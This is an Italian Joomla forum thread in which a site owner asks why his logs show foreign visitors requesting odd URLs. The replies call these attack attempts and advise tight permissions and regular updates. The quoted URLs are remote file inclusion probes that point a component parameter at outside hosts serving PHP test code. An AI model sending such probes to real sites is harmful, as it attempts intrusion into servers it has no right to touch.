Back to top

Autore Topic: Qualcuno sta usando il mio sito per attaccare altri?  (Letto 1395 volte)

Offline pippobit

  • Nuovo arrivato
  • *
  • Post: 38
    • Mostra profilo
Salve,
ripropongo un problema già presentato in passato, per il quale non ho ricevuto risposta.
Da diverso tempo, analizzando i dati di accesso mediante JoomlaStat, trovo utenti di fuori nazione (ho un sito personale visitato solo dai miei amici che vivono in Italia) che consultano pagine con URL come queste:
http://www.miodominio.ext/index.php?option=com_blogsidebar&task=blogsection&isbydate=http://www.felixtorresycia.com/admin/correo/enaq/ecib/&id=2&Itemid=11&svt_date=2008-03-01&bsb_midx=0
http://www.miodominio.ext/index.php?&bsb_midx=http://www.thoseguysfilms.com/forums/templates/subSilver/images/uza/laqipu/

Come si nota, nelle url compaiono indirizzi di altri siti (non miei); andandole a visitare compare solo il codice in PHP
<?php echo md5("just_a_test");?>

Che sta succedendo? E' possibile che questa cosa capiti solo a me?
Ieri sera ho fatto l'aggiornamento del core alla 1.0.15 ma stanotte è successo ancora.
Chi si appoggia al mio sito per fare quelle operazioni ogni volta cambia il suo dominio di provenienza impedendomi di bloccare un determinato range di ip.

Help! Inizio a preoccuparmi...

Saluti a tutti

Offline Luca Curatola

  • Team Joomla.it
  • Abituale
  • *******
  • Post: 1086
  • Sesso: Maschio
    • Mostra profilo
Re: Qualcuno sta usando il mio sito per attaccare altri?
« Risposta #1 il: 04 Mar 2008, 12:40:53 »
Sono tentativi di attacchi al tuo sito.
Sgaragnao il provider più ricercato su google! :)

Offline pippobit

  • Nuovo arrivato
  • *
  • Post: 38
    • Mostra profilo
Re: Qualcuno sta usando il mio sito per attaccare altri?
« Risposta #2 il: 04 Mar 2008, 13:35:21 »
Ah...

...e come mi tutelo? O sono già tutelato, visto che funziona nonostante gli attacchi?

Offline Luca Curatola

  • Team Joomla.it
  • Abituale
  • *******
  • Post: 1086
  • Sesso: Maschio
    • Mostra profilo
Re: Qualcuno sta usando il mio sito per attaccare altri?
« Risposta #3 il: 04 Mar 2008, 13:47:17 »
Adottando le normali cautele:
- Permessi non troppo libertini
- Aggiornamenti costanti di joomla
- Aggiornamenti costanti di componenti/moduli/mambot
Sgaragnao il provider più ricercato su google! :)

 



Web Design Bolzano Kreatif